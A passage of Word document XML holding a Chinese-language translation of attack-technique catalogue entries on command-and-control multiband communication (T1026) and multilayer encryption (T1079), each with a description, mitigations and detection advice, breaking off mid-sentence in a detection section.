        <w:t>相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未知或可疑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机数据对于补充基于恶意软件</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>签名和基础架构的任何现有损害指标非常重要。</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统和网络信息或横向移动可能导致的后续操作与原始过程相关联也可以产生有用的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51F5D8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>多频段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通信</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="50055CC5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35515CAD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> T1026</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5D2068" w14:textId="5BBC9E03" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B0FB2A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A05BBD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析，进程使用网络，恶意代码逆向工程，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AEC4790" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00242E26" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65823A59" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00242E26">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00242E26">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78C4D5BE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005C59F6" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3248D49B" w14:textId="11D76877" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些攻击者可能会分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同协议之间的通信。一个用于入站</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的协议，另一个用于出站数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以让</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它绕过某些防火墙限制。</w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00373275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拆分也可以是随机的，以简单地避免任何一个通信上的数据阈值警报。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F111E71" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="7756"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="60BCB55F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3EC9B09D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5A894F86" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="003C13F0" w14:paraId="5EAA50EE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4286FAB8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F4D2C53" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用网络签名来识别特定恶意软件的流量的网络入侵检测和防御系统可用于缓解网络级别的活动。</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名通常用于协议内的唯一识别符，基于特定攻击者或工具使用的特定协议，并且可能在各种恶意软件系列和版本之间不同。</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者可能会随着时间的推移改变工具</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名或构建协议，以避免被常见的防御工具检测到。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46EFA010" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC6B56" w14:textId="1EE5069A" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析不常见数据流的网络数据（例如，客户端发送的数据明显多于从服务器接收的数据）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用通常不具有网络通信</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或从未见过的网络的过程是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容以检测不遵循正在使用的端口的预期协议行为的通信。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关联多个通信通道之间的警报可以进一步帮助识别</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EC72B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>多层加密</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="432C5D39" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41FB7917" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00963F48" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00963F48">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00963F48">
              <w:t xml:space="preserve"> T1079</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6761313C" w14:textId="1989AF07" w:rsidR="00A0413E" w:rsidRPr="00963F48" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00963F48">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00963F48">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16AAA863" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00963F48" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00963F48">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00963F48">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C0A8C6C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00963F48" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00963F48">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00963F48">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00963F48">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包，进程使用网络，恶意代码逆向工程，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB9D664" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00963F48" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="136274ED" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00963F48">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00963F48">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1801253B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002057E0" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFE13E2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者使用多层加密执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信，通常（但不是唯一地）在协议加密方案（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）内隧道化自定义加密方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DC1EE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="7756"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="6D46A0A6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6615B8FA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6A662FDA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="003C13F0" w14:paraId="560B22F7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="498DF412" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65D92270" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用网络签名来识别特定恶意软件的流量的网络入侵检测和防御系统可用于缓解网络级别的活动。使用加密协议可能使得典型的基于网络的</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测更加困难。</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基础设施的先验知识可能对域和</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址阻止有用，但可能不是一个有效的长期解决方案，因为攻击者可以经常更改它们。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04493660" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7AFC9" w14:textId="3F9A2450" w:rsidR="00A0413E" w:rsidRPr="00F6630C" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果恶意软件使用标准加密协议，则可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL / TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查来检测某些加密通信信道中的</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSL / TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
